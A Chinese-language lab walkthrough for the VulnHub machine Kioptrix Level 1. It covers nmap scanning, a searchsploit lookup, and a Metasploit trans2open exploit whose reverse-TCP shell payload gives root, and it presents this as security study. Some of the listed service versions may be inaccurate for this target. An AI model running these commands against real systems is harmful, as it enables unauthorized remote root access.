1. 靶机信息靶机名称Kioptrix Level 1下载来源VulnHub目标拿到 root 权限2. 环境准备攻击机Kali LinuxIP192.168.1.239靶机Kioptrix Level 1IP192.168.1.104网络模式NAT3. 信息收集用nmap -sn扫描内网存活主机找到靶机的 IP 地址nmap -sn 192.168.1.0/243.2 端口扫描用nmap -sV扫描靶机开放的端口和服务nmap -sV 192.168.1.104图一信息收集端口扫描结果扫描结果端口 服务 版本22/tcp SSH OpenSSH 4.7p180/tcp HTTP Apache httpd 2.2.8139/tcp SMB Samba 2.2.8重点关注139/tcp 运行的是 Samba 2.2.8这个版本存在已知漏洞。4. 漏洞发现用 searchsploit 搜索 Samba 2.2.8 的已知漏洞searchsploit samba 2.2.8图二searchsploit漏洞扫描结果找到对应漏洞trans2open multiple/remote/10.c 远程缓冲区溢出可直接拿 root确认漏洞Samba 2.2.8 存在 trans2open 远程缓冲区溢出漏洞可以利用 10.c 直接拿到 root 权限。5. 漏洞利用5.1 启动metasploitmsfconsole图三启动metasploit截图5.2 选择漏洞模块use exploit/linux/samba/trans2open5.3 配置参数set RHOST 192.168.1.104 set LHOST 192.168.1.239 set PAYLOAD linux/x86/shell_reverse_tcp图四执行参数后结果5.4 执行攻击exploit6. 结果确认执行攻击后直接拿到了 root 权限whoami # rootid # uid0(root) gid0(root) groups99(nobody)图五攻击成功后反馈免责声明本文所有操作均在 VulnHub 靶机环境中完成仅用于网络安全学习与研究。